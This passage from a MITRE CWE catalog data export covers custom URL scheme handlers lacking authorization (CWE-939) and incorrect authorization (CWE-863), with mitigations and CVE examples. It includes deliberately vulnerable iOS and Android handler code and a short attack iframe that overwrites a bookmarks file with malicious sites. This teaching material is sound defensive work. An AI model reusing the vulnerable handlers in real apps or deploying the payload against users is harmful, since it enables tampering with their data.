"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2019-06-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-12-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2024-02-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": "2024-02-29",
"ModificationVersion": "4.14",
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2008-04-11",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Alternate Path Errors",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2010-12-13",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Failure to Protect Alternate Path",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed-with-Review
|
This CWE entry is a Class and might have Base-level children that would be more appropriate
|
Examine children of this entry to see if there is a better fit
|
[
"Abstraction"
] | null |
[
{
"CweID": "693",
"Nature": "ChildOf",
"Ordinal": null,
"ViewID": "1000"
},
{
"CweID": "638",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null | null | null | null | null | null | 3
|
[
[
"693",
"424"
],
[
"710",
"657",
"638",
"424"
],
[
"284",
"285",
"862",
"638",
"424"
]
] |
[
"425"
] |
939
|
Improper Authorization in Handler for Custom URL Scheme
|
Base
|
Simple
|
Incomplete
|
The product uses a handler for a custom URL scheme, but it does not properly restrict which actors can invoke the handler using the scheme.
|
Mobile platforms and other architectures allow the use of custom URL schemes to facilitate communication between applications. In the case of iOS, this is the only method to do inter-application communication. The implementation is at the developer's discretion which may open security flaws in the application. An example could be potentially dangerous functionality such as modifying files through a custom URL scheme.
|
[
{
"Class": "Mobile",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "REALIZATION: This weakness is caused during implementation of an architectural security tactic.",
"Phase": "Implementation"
}
] | null |
[
{
"Description": "\n\nUtilize a user prompt pop-up to authorize potentially harmful actions such as those modifying data or dealing with sensitive information.\n\n\nWhen designing functionality of actions in the URL scheme, consider whether the action should be accessible to all mobile applications, or if an allowlist of applications to interface with is appropriate.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
}
] |
[
{
"Description": "URL scheme has action replace which requires no user prompt and allows remote attackers to perform undesired actions.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2013-5725",
"Reference": "CVE-2013-5725"
},
{
"Description": "URL scheme has action follow and favorite which allows remote attackers to force user to perform undesired actions.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2013-5726",
"Reference": "CVE-2013-5726"
}
] | null | null | null |
[
{
"Authors": [
"Guillaume Ross"
],
"Edition": null,
"ExternalReferenceID": "REF-938",
"Publication": null,
"PublicationDay": "11",
"PublicationMonth": "11",
"PublicationYear": "2013",
"Publisher": null,
"Section": null,
"Title": "Scheming for Privacy and Security",
"URL": "https://brooksreview.net/2013/11/guest-post_scheming-for-privacy-and-security/",
"URLDate": "2023-04-07"
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2014-01-14",
"SubmissionName": "CWE Content Team",
"SubmissionOrganization": "MITRE",
"SubmissionReleaseDate": "2014-02-19",
"SubmissionVersion": "2.6",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2017-01-19",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Modes_of_Introduction, References, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2020-06-25",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2021-03-15",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "862",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This iOS application uses a custom URL scheme. The replaceFileText action in the URL scheme allows an external application to interface with the file incomingMessage.txt and replace the contents with the text field of the query string.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "External Application",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tNSString *stringURL = @\"appscheme://replaceFileText?file=incomingMessage.txt&text=hello\";\n\tNSURL *url = [NSURL URLWithString:stringURL];\n\t[[UIApplication sharedApplication] openURL:url];\n```",
"IntroText": null,
"Language": "Objective-C",
"Nature": "Good",
"Reference": null
},
{
"BodyText": "Application URL Handler",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t- (BOOL)application:(UIApplication *)application handleOpenURL:(NSURL *)url {\n\t\tif (!url) {\n\t\t\treturn NO;\n\t\t}\n\t\tNSString *action = [url host];\n\t\tif([action isEqualToString: @\"replaceFileText\"]) {\n\t\t\tNSDictionary *dict = [self parseQueryStringExampleFunction:[url query]];\n```\n//this function will write contents to a specified file* \n\t\t\tFileObject *objectFile = [self writeToFile:[dict objectForKey: @\"file\"] withText:[dict objectForKey: @\"text\"]];}\n\t\treturn YES;}",
"IntroText": null,
"Language": null,
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "The handler has no restriction on who can use its functionality. The handler can be invoked using any method that invokes the URL handler such as the following malicious iframe embedded on a web page opened by Safari.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t<iframe src=\"appscheme://replaceFileText?file=Bookmarks.dat&text=listOfMaliciousWebsites\">\n```",
"IntroText": null,
"Language": "HTML",
"Nature": "Attack",
"Reference": null
},
{
"BodyText": "The attacker can host a malicious website containing the iframe and trick users into going to the site via a crafted phishing email. Since Safari automatically executes iframes, the user is not prompted when the handler executes the iframe code which automatically invokes the URL handler replacing the bookmarks file with a list of malicious websites. Since replaceFileText is a potentially dangerous action, an action that modifies data, there should be a sanity check before the writeToFile:withText: function.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application:",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n```\n// Android* \n\t@Override\n\tpublic boolean shouldOverrideUrlLoading(WebView view, String url){\n\t```\n\t\t\tif (url.substring(0,14).equalsIgnoreCase(\"examplescheme:\")){\n\t\t\t\tif(url.substring(14,25).equalsIgnoreCase(\"getUserInfo\")){\n\t\t\t\t\twriteDataToView(view, UserData);\n\t\t\t\t\treturn false;\n\t\t\t\t}\n\t\t\t\telse{\n\t\t\t\t\treturn true;\n\t\t\t\t}\n\t\t\t}\n\t}\n```",
"IntroText": null,
"Language": "Java",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n```\n// iOS* \n\t-(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType\n\t{\n\t```\n\t\t\tNSURL *URL = [exRequest URL];\n\t\t\tif ([[URL scheme] isEqualToString:@\"exampleScheme\"])\n\t\t\t{\n\t\t\t\t\tNSString *functionString = [URL resourceSpecifier];\n\t\t\t\t\tif ([functionString hasPrefix:@\"specialFunction\"])\n\t\t\t\t\t{\n```\n// Make data available back in webview.* \n\t\t\t\t\t\t\tUIWebView *webView = [self writeDataToView:[URL query]];}\n\t\t\t\t\treturn NO;}\n\t\t\treturn YES;}",
"IntroText": null,
"Language": "Objective-C",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "A call into native code can then be initiated by passing parameters within the URL:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\twindow.location = examplescheme://method?parameter=value\n```",
"IntroText": null,
"Language": "JavaScript",
"Nature": "Attack",
"Reference": null
},
{
"BodyText": "Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-109"
}
] | null | null | null | null | 1
|
[
[
"284",
"285",
"862",
"939"
]
] |
[] |
863
|
Incorrect Authorization
|
Class
|
Simple
|
Incomplete
|
The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.
| null |
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": null,
"Name": "Web Server",
"Prevalence": "Often",
"Type": "Technology"
},
{
"Class": null,
"Name": "Database Server",
"Prevalence": "Often",
"Type": "Technology"
}
] |
[
{
"Description": "\"AuthZ\" is typically used as an abbreviation of \"authorization\" within the web application security community. It is distinct from \"AuthN\" (or, sometimes, \"AuthC\") which is an abbreviation of \"authentication.\" The use of \"Auth\" as an abbreviation is discouraged, since it could be used for either authentication or authorization.",
"Term": "AuthZ"
}
] |
[
{
"Note": "Authorization weaknesses may arise when a single-user application is ported to a multi-user environment.",
"Phase": "Architecture and Design"
},
{
"Note": "\n\nREALIZATION: This weakness is caused during implementation of an architectural security tactic.\n\n\nA developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies.\n",
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Read Application Data",
"Read Files or Directories"
],
"Likelihood": null,
"Note": "An attacker could bypass intended access restrictions to read sensitive data, either by reading the data directly from a data store that is not correctly restricted, or by accessing insufficiently-protected, privileged functionality to read the data.",
"Scope": [
"Confidentiality"
]
},
{
"Impact": [
"Modify Application Data",
"Modify Files or Directories"
],
"Likelihood": null,
"Note": "An attacker could bypass intended access restrictions to modify sensitive data, either by writing the data directly to a data store that is not correctly restricted, or by accessing insufficiently-protected, privileged functionality to write the data.",
"Scope": [
"Integrity"
]
},
{
"Impact": [
"Gain Privileges or Assume Identity",
"Bypass Protection Mechanism"
],
"Likelihood": null,
"Note": "An attacker could bypass intended access restrictions to gain privileges by modifying or reading critical data directly, or by accessing privileged functionality.",
"Scope": [
"Access Control"
]
},
{
"Impact": [
"Execute Unauthorized Code or Commands"
],
"Likelihood": null,
"Note": "An attacker could use elevated privileges to execute unauthorized commands or code.",
"Scope": [
"Confidentiality",
"Integrity",
"Availability"
]
},
{
"Impact": [
"DoS: Crash, Exit, or Restart",
"DoS: Resource Consumption (CPU)",
"DoS: Resource Consumption (Memory)",
"DoS: Resource Consumption (Other)"
],
"Likelihood": null,
"Note": "An attacker could gain unauthorized access to resources on the system and excessively consume those resources, leading to a denial of service.",
"Scope": [
"Availability"
]
}
] |
[
{
"Description": "\n\nDivide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.\n\n\nNote that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "\n\nUse a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.\n\n\nFor example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-4.4",
"Phase": [
"Architecture and Design"
],
"Strategy": "Libraries or Frameworks"
},
{
"Description": "\n\nFor web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.\n\n\nOne way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a \"default deny\" policy when defining these ACLs.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"System Configuration",
"Installation"
],
"Strategy": null
}
] |
[
{
"Description": "Chain: A microservice integration and management platform compares the hostname in the HTTP Host header in a case-sensitive way (CWE-178, CWE-1289), allowing bypass of the authorization policy (CWE-863) using a hostname with mixed case or other variations.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2021-39155",
"Reference": "CVE-2021-39155"
},
{
"Description": "Chain: sscanf() call is used to check if a username and group exists, but the return value of sscanf() call is not checked (CWE-252), causing an uninitialized variable to be checked (CWE-457), returning success to allow authorization bypass for executing a privileged (CWE-863).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2019-15900",
"Reference": "CVE-2019-15900"
},
{
"Description": "Gateway uses default \"Allow\" configuration for its authorization settings.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-2213",
"Reference": "CVE-2009-2213"
},
{
"Description": "Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-0034",
"Reference": "CVE-2009-0034"
},
{
"Description": "Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-6123",
"Reference": "CVE-2008-6123"
},
{
"Description": "Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-7109",
"Reference": "CVE-2008-7109"
},
{
"Description": "Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-3424",
"Reference": "CVE-2008-3424"
},
{
"Description": "ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-4577",
"Reference": "CVE-2008-4577"
},
{
"Description": "Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2006-6679",
"Reference": "CVE-2006-6679"
},
{
"Description": "Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-2801",
"Reference": "CVE-2005-2801"
},
{
"Description": "Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2001-1155",
"Reference": "CVE-2001-1155"
}
] | null |
[
{
"EntryID": "Part 4-1",
"EntryName": "Req SD-4",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 4-2",
"EntryName": "Req CR 2.1",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 4-2",
"EntryName": "Req CR 2.2",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 3-3",
"EntryName": "Req SR 2.1",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 3-3",
"EntryName": "Req SR 2.2",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 4-1",
"EntryName": "Req SVV-1",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 4-1",
"EntryName": "Req SVV-4",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 4-1",
"EntryName": "Req SD-1",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
}
] | null |
[
{
"Authors": [
"NIST"
],
"Edition": null,
"ExternalReferenceID": "REF-229",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Role Based Access Control and Role Based Security",
"URL": "https://csrc.nist.gov/projects/role-based-access-control",
"URLDate": "2023-04-07"
},
{
"Authors": [
"Michael Howard",
"David LeBlanc"
],
"Edition": "2nd Edition",
"ExternalReferenceID": "REF-7",
"Publication": null,
"PublicationDay": "04",
"PublicationMonth": "12",
"PublicationYear": "2002",
"Publisher": "Microsoft Press",
"Section": "Chapter 4, \"Authorization\" Page 114; Chapter 6, \"Determining\n Appropriate Access Control\" Page 171",
"Title": "Writing Secure Code",
"URL": "https://www.microsoftpressstore.com/store/writing-secure-code-9780735617223",
"URLDate": null
},
{
"Authors": [
"Frank Kim"
],
"Edition": null,
"ExternalReferenceID": "REF-231",
"Publication": null,
"PublicationDay": "04",
"PublicationMonth": "03",
"PublicationYear": "2010",
"Publisher": "SANS Software Security Institute",
"Section": null,
"Title": "Top 25 Series - Rank 5 - Improper Access Control (Authorization)",
"URL": "https://www.sans.org/blog/top-25-series-rank-5-improper-access-control-authorization/",
"URLDate": "2023-04-07"
},
{
"Authors": [
"Rahul Bhattacharjee"
],
"Edition": null,
"ExternalReferenceID": "REF-233",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Authentication using JAAS",
"URL": "https://javaranch.com/journal/2008/04/authentication-using-JAAS.html",
"URLDate": "2023-04-07"
},
{
"Authors": [
"OWASP"
],
"Edition": null,
"ExternalReferenceID": "REF-45",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "OWASP Enterprise Security API (ESAPI) Project",
"URL": "http://www.owasp.org/index.php/ESAPI",
"URLDate": null
},
{
"Authors": [
"Mark Dowd",
"John McDonald",
"Justin Schuh"
],
"Edition": "1st Edition",
"ExternalReferenceID": "REF-62",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2006",
"Publisher": "Addison Wesley",
"Section": "Chapter 2, \"Common Vulnerabilities of Authorization\", Page 39",
"Title": "The Art of Software Security Assessment",
"URL": null,
"URLDate": null
}
] |
[
{
